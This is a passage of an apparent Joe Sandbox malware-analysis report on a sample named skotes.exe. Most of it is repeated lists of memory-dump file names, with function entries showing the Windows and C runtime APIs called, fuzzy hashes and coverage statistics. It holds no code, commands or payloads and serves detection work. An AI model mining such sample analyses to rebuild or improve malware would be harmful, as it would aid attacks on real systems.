Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa621db5a87302c3206f985f197d0fb60e7fb0751afcf48ea0af63371437180b
Instruction ID: 4031ee6c60706c2f74a664a0f5161c8bb2eb05d0e3e9d971c9385462592127b0
Opcode Fuzzy Hash: fa621db5a87302c3206f985f197d0fb60e7fb0751afcf48ea0af63371437180b
Instruction Fuzzy Hash: 2EF02732A462B466EB313A739C01B6B3758DF853B0F188021EC08EB981DF35DE00B2E0

Non-executed Functions

Function 00FB2EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00FB2F5F
GetCurrentThreadId.KERNEL32 ref: 00FB2F7E
__Mtx_unlock.LIBCPMT ref: 00FB2FCC
__Cnd_broadcast.LIBCPMT ref: 00FB2FE3
__Mtx_unlock.LIBCPMT ref: 00FB30F5
GetCurrentThreadId.KERNEL32 ref: 00FB3132
__Mtx_unlock.LIBCPMT ref: 00FB319B

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
Instruction ID: f5ee0a315b13735ce78b5442ae3d57aee6f27532b6768a99d802f446fa2a376d
Opcode Fuzzy Hash: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
Instruction Fuzzy Hash: 2BA1F371E41206AFDB10EF65CE45BAAB7A8FF14364F04812DE819D7241EB35EA04EBD1

Function 00FECBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00FECC66

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: dd05b4bd6bc9a135e851fbdd7a7336a55597385e22180c520d6f357ff6532f2f
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: 8FB1F232D042C59FDB25CF2AC881BBEBBA5EF45350F24416AF855EB241D6399D03DBA0

Function 00FCBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00FCBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00FCBBE4
_xtime_get.LIBCPMT ref: 00FCBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00FCBC13

Memory Dump Source

Source File: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.2129751050.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2129775105.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130310934.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130333140.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130355615.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130377442.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130404260.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130539606.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130562836.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130636306.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130654760.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130673771.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130737289.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130762098.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130787175.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130823389.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130840774.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130864322.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130895390.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130924370.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130947293.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130972857.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2130998115.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131016737.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131036067.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131054531.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131069617.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131083882.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131098490.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131114327.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131129643.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131144841.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131161563.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131177987.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131193689.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131210563.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131225546.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131297846.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131339315.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131359944.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131412184.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131429177.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131446330.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131463521.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131482625.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2131500783.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 1e25fd00b6645ea3f3f10a8d89662976f3497dfa54fee0d2e74eff1423a5f977
Instruction ID: 632d9fab2a9d2fe0873d983d54fb034023beb8ec72c64e01e7aef8ded841783b
Opcode Fuzzy Hash: 1e25fd00b6645ea3f3f10a8d89662976f3497dfa54fee0d2e74eff1423a5f977
Instruction Fuzzy Hash: AF211D75E0011AAFDF01EBA4DE82EBEB7B9EF48710F11005DF505A7251DB399D01ABA1

Analysis Process: skotes.exePID: 1960, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	613
Total number of Limit Nodes:	4

Executed Functions

Function 00FE652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00FE652A,?,?,?,?,?,00FE7661), ref: 00FE6567

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 972bb84d36547166be69c46616453fc5e936bdb08b6cb8e5b3ea0b8e258e608c
Instruction ID: 743d560e2d4e36aa14595eefa7c69cf3835820533e81a462a9b6293a4c9922b7
Opcode Fuzzy Hash: 972bb84d36547166be69c46616453fc5e936bdb08b6cb8e5b3ea0b8e258e608c
Instruction Fuzzy Hash: 71E08C3050528CAFCE257F1ACC5995C3B6AFB62799F040800F80886227CB39EE91EA80

Function 00FB9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
